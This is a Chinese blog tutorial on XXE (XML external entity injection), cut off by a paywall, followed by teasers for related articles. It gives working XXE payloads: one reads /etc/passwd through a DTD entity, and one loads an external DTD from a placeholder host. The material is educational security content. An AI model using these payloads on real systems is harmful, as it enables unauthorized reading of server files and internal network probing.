浅浅浅浅谈XXE漏洞(附XXE攻击实例CVE-2017-12629)

最新推荐文章于 2024-07-04 17:45:06 发布
最新推荐文章于 2024-07-04 17:45:06 发布
阅读量3.8k 收藏 13
点赞数 4
分类专栏: CVE 文章标签: XXE XML CVE XXE攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csacs/article/details/88220227
版权
本文深入探讨了XXE(XML外部实体注入)漏洞,介绍了其基本概念、利用方式,如文件读取、内网探测和SSRF攻击,并详细复现了CVE-2017-12629攻击实例。同时,文章还提出了漏洞修复的建议,包括禁用外部实体和过滤用户提交的XML数据。
摘要由CSDN通过智能技术生成

浅浅浅浅谈XXE漏洞(附XXE攻击实例CVE-2017-12629)

  • 我从未拥有过你一秒钟,心里却失去过你千万次。

XXE漏洞概述:

XXE就是XML外部实体注入。当允许引用外部实体时,通过构造任意PAYLOAD,导致可读取任意文件、命令执行、探测内网信息、攻击内网网站等危害。

XXE漏洞基本概念:

  • 主要是对外部实体数据(XML,可自定义)进行处理时引发的漏洞。
  • XML 指可扩展标记语言,即允许用户对自己的标记语言进行定义的源语言。XML 的设计宗旨是传输数据,而非显示数据。
  • XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。如下图:

在这里插入图片描述
不同语言支持的不同协议
在这里插入图片描述

  • 引入外部实体方式有多种,主要这三个:
    (这些都是有回显的,无回显建议利用数据外带)

1.直接通过DTD外部实体声明

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cat [<!ENTITY cat SYSTEM "file:///etc/passwd" >]>
<a>&cat;</a>

2.通过DTD文档引入外部DTD文档,再引入外部实体声明.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cat [<!ENTITY cat SYSTEM "http://cat.com/cat.dtd" >]>
<a>&cat;</a>


//dtd文件内容 <!ENTITY cat SYSTE
最低0.47元/天 解锁文章
SoulCat.
关注
专栏目录
[ vulhub漏洞复现篇 ] solr XML外部实体注入(CVE-2017-12629-xxe)
qq_51577576的博客
12-11 819
[ vulhub漏洞复现篇 ] solr XML外部实体注入(CVE-2017-12629-xxe) Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE)。
Apache Solr 远程命令执行漏洞CVE-2017-12629
weixin_45022281的博客
10-13 2561
Apache Solr 远程命令执行漏洞CVE-2017-12629漏洞描述: 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。 风险
xxe漏洞原理和案例实验演示
北冥有鱼
05-30 1256
什么是xmlxml一般指可扩展标记语言 可扩展标记语言,标准通用标记语言的子集,是一种用于标记电子文件使其具有结构性的标记语言。 在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 它非常适合万维网传输,提供统一的方法来描述和交换独立于应用程序或供应商的结构...
XXE漏洞安全-全网最详细讲解】
最新发布
heike_Ch的博客
07-04 591
Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。XXE漏洞的发生通常是由于应用程序在解析XML输入时未正确验证或限制实体引用。攻击者可以通过构造恶意的XML输入,将外部实体(externalentity)引用进来,然后利用这些实体来获取敏感信息或进行其他攻击。其中最常见的一种攻击是利用DTD(Document Type。
XXE 漏洞及案例实战
来日可期的博客
09-24 2762
XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
CVE-2017-12629:Apache Solr XXE&&RCE
qq_61553520的博客
05-13 1079
pache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE)。漏洞影响版本:Apache Solr before 7.1 with Apache Lucene before 7.1。
Apache solr XML&RCE 漏洞(CVE-2017-12629)
weixin_44047654的博客
02-22 661
Apache Solr XXE & RCE 漏洞(CVE-2017-12629)
xxe漏洞学习
L1ni01
11-06 190
xxe漏洞学习 一.XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD元素 DTD属性 以下是 属性类型的选项: 我们XXE 利用的是 它的实体属性 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。 内部声明DTD <!DOCTYPE 根元素 [元素声明]&gt
SQL JDBC XXE漏洞复现-CVE-2021-2471
Armandhe的博客
10-22 3838
MySQL JDBC XXE漏洞复现-CVE-2021-2471
XXE是什么?XXE漏洞原理及案例讲解(从0到1完全掌握XXE
白帽黑客八哥的博客
12-14 6093
XXEXML外部实体注入)是一种针对应用程序处理XML数据的方式的攻击XML文档可以定义实体,它们是存储文档中其他地方重复使用的数据的方式。外部实体是一种特殊类型的实体,它们的内容被定义在XML文档外部。XXE漏洞发生在当应用程序解析含有外部实体引用的XML文档时,没有正确地限制或禁止这些外部实体的使用。XXE是一种严重的安全漏洞,它的存在可能导致严重的安全风险。开发人员和安全专家必须了解此类漏洞的工作原理,确保在处理XML数据时采取适当的安全措施,以保护应用程序和数据的安全。
xxe攻击
蚁景网安学院
11-06 416
本篇是依葫芦画瓢,进行了测试和讲解。先提醒,没有实际例子,本人挖洞经验太少,没有遇到相关例子,文末会给出合适的方法寻找,有兴趣可以去具体操作下。下面有些文字和图是不同时间配的,导致不一样...
Apache Solr远程代码执行漏洞CVE-2017-12629
3569
01-22 5696
http://www.freebuf.com/sectool/159970.html 一 漏洞简介 Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。 二 漏洞利用 2.1. 环境介绍 Ubuntu14 64位环境(sol
CVE-2017-12629)Apache Solr RCE命令执行漏洞复现
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
02-16 4583
攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改.apache solr默认继承VelocityResponseWriter插件.Apache solr远程命令执行(CVE-2019-0193).
深入理解XXE漏洞攻击策略与防范
XXE攻击是一种针对XML输入验证不足的安全漏洞攻击者可以通过构造恶意的XML文档来访问服务器的内部系统或导致服务拒绝。 **1. 外部实体引用远程文件读取** 攻击者通过定义XML文档中的外部实体,引用服务器可访问的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值